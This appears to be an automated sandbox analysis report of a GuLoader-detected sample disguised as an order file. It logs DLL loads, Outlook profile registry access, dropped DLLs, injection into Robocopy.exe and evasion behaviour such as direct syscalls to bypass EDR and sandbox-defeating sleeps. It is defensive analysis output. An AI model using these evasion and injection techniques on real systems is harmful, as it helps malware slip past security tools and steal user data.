Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Windows\SysWOW64\Robocopy.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Switches to a custom stack to bypass stack traces

Source: IMG_00991ORDER_FILES.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000034FF4000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034E4A000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: IMG_00991ORDER_FILES.exe, IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000034FF4000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034E4A000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe
Source:	Binary string: mshtml.pdbUGP source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.6646879264.00000000068C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Code function: 0_2_6F8A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6F8A1BFF

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 0_2_6F8A30C0 push eax; ret	0_2_6F8A30EE
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D08CD push ecx; mov dword ptr [esp], ecx	3_2_351D08D6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_049F08CD push ecx; mov dword ptr [esp], ecx	5_2_049F08D6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D174DB push eax; retf	5_2_04D174F7
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D13DB4 pushad ; ret	5_2_04D13E61
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1FECC push ebp; retf	5_2_04D1FECD
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D158D9 push D494064Eh; iretd	5_2_04D158DE
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D14870 push edi; retf	5_2_04D14871
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1C1CA push ebp; ret	5_2_04D1C1F6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D102F3 push ds; ret	5_2_04D102F6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D25262 push eax; ret	5_2_04D25264
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1BA36 push esi; ret	5_2_04D1BA45
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D1C225 push ebp; ret	5_2_04D1C1F6
Source: C:\Windows\SysWOW64\Robocopy.exe	Code function: 5_2_04D163E2 push ebx; iretd	5_2_04D16409

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	File created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	File created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	File created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	File created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	File created: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dll	Jump to dropped file

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	API/Special instruction interceptor: Address: 6EB14E4
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	API/Special instruction interceptor: Address: 3B314E4
Source: C:\Windows\SysWOW64\Robocopy.exe	API/Special instruction interceptor: Address: 7FF9C282D144
Source: C:\Windows\SysWOW64\Robocopy.exe	API/Special instruction interceptor: Address: 7FF9C282D604
Source: C:\Windows\SysWOW64\Robocopy.exe	API/Special instruction interceptor: Address: 7FF9C282D764
Source: C:\Windows\SysWOW64\Robocopy.exe	API/Special instruction interceptor: Address: 7FF9C282D324
Source: C:\Windows\SysWOW64\Robocopy.exe	API/Special instruction interceptor: Address: 7FF9C282D364
Source: C:\Windows\SysWOW64\Robocopy.exe	API/Special instruction interceptor: Address: 7FF9C282D004
Source: C:\Windows\SysWOW64\Robocopy.exe	API/Special instruction interceptor: Address: 7FF9C282FF74
Source: C:\Windows\SysWOW64\Robocopy.exe	API/Special instruction interceptor: Address: 7FF9C282D864

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Code function: 3_2_35211763 rdtsc

3_2_35211763

Source: C:\Windows\SysWOW64\Robocopy.exe

Window / User API: threadDelayed 9646

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn2852.tmp\LangDLL.dll	Jump to dropped file

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	API coverage: 0.3 %
Source: C:\Windows\SysWOW64\Robocopy.exe	API coverage: 1.9 %

Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7956	Thread sleep count: 326 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7956	Thread sleep time: -652000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7956	Thread sleep count: 9646 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe TID: 7956	Thread sleep time: -19292000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936	Thread sleep time: -69000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe TID: 4936	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\Robocopy.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\Robocopy.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_00405C60
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 0_2_004068B1 FindFirstFileW,FindClose,		0_2_004068B1

Source: IMG_00991ORDER_FILES.exe, 00000003.00000002.6853746492.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	API call chain: ExitProcess graph end node			graph_0-2685
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	API call chain: ExitProcess graph end node			graph_0-2910

Source: C:\Windows\SysWOW64\Robocopy.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\Robocopy.exe

Process queried: DebugPort

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Code function: 3_2_35211763 rdtsc

3_2_35211763

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Code function: 0_2_00406044 GetFileAttributesW,LdrInitializeThunk,LdrInitializeThunk,CreateFileW,

0_2_00406044

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Code function: 0_2_6F8A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6F8A1BFF

Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35201527 mov eax, dword ptr fs:[00000030h]	3_2_35201527
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]	3_2_351F1514
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]	3_2_351F1514
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]	3_2_351F1514
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]	3_2_351F1514
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]	3_2_351F1514
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351F1514 mov eax, dword ptr fs:[00000030h]	3_2_351F1514
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35212539 mov eax, dword ptr fs:[00000030h]	3_2_35212539
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]	3_2_351FE507
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]	3_2_351FE507
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]	3_2_351FE507
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]	3_2_351FE507
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]	3_2_351FE507
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]	3_2_351FE507
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]	3_2_351FE507
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351FE507 mov eax, dword ptr fs:[00000030h]	3_2_351FE507
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D2500 mov eax, dword ptr fs:[00000030h]	3_2_351D2500
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CB502 mov eax, dword ptr fs:[00000030h]	3_2_351CB502
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C753F mov eax, dword ptr fs:[00000030h]	3_2_351C753F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C753F mov eax, dword ptr fs:[00000030h]	3_2_351C753F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351C753F mov eax, dword ptr fs:[00000030h]	3_2_351C753F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D3536 mov eax, dword ptr fs:[00000030h]	3_2_351D3536
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D3536 mov eax, dword ptr fs:[00000030h]	3_2_351D3536
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520C50D mov eax, dword ptr fs:[00000030h]	3_2_3520C50D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520C50D mov eax, dword ptr fs:[00000030h]	3_2_3520C50D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]	3_2_351E252B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]	3_2_351E252B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]	3_2_351E252B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]	3_2_351E252B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]	3_2_351E252B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]	3_2_351E252B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351E252B mov eax, dword ptr fs:[00000030h]	3_2_351E252B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525C51D mov eax, dword ptr fs:[00000030h]	3_2_3525C51D
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov ecx, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov ecx, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3527F51B mov eax, dword ptr fs:[00000030h]	3_2_3527F51B
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D254C mov eax, dword ptr fs:[00000030h]	3_2_351D254C
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EE547 mov eax, dword ptr fs:[00000030h]	3_2_351EE547
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35206540 mov eax, dword ptr fs:[00000030h]	3_2_35206540
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35208540 mov eax, dword ptr fs:[00000030h]	3_2_35208540
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352AB55F mov eax, dword ptr fs:[00000030h]	3_2_352AB55F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352AB55F mov eax, dword ptr fs:[00000030h]	3_2_352AB55F
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3529A553 mov eax, dword ptr fs:[00000030h]	3_2_3529A553
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351EC560 mov eax, dword ptr fs:[00000030h]	3_2_351EC560
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352585AA mov eax, dword ptr fs:[00000030h]	3_2_352585AA
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520A580 mov eax, dword ptr fs:[00000030h]	3_2_3520A580
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520A580 mov eax, dword ptr fs:[00000030h]	3_2_3520A580
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3528F582 mov eax, dword ptr fs:[00000030h]	3_2_3528F582
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E588 mov eax, dword ptr fs:[00000030h]	3_2_3524E588
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3524E588 mov eax, dword ptr fs:[00000030h]	3_2_3524E588
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D45B0 mov eax, dword ptr fs:[00000030h]	3_2_351D45B0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351D45B0 mov eax, dword ptr fs:[00000030h]	3_2_351D45B0
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_35202594 mov eax, dword ptr fs:[00000030h]	3_2_35202594
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520A5E7 mov ebx, dword ptr fs:[00000030h]	3_2_3520A5E7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3520A5E7 mov eax, dword ptr fs:[00000030h]	3_2_3520A5E7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_352015EF mov eax, dword ptr fs:[00000030h]	3_2_352015EF
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_3525C5FC mov eax, dword ptr fs:[00000030h]	3_2_3525C5FC
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe	Code function: 3_2_351CF5C7 mov eax, dword ptr fs:[00000030h]	3_2_351CF5C7
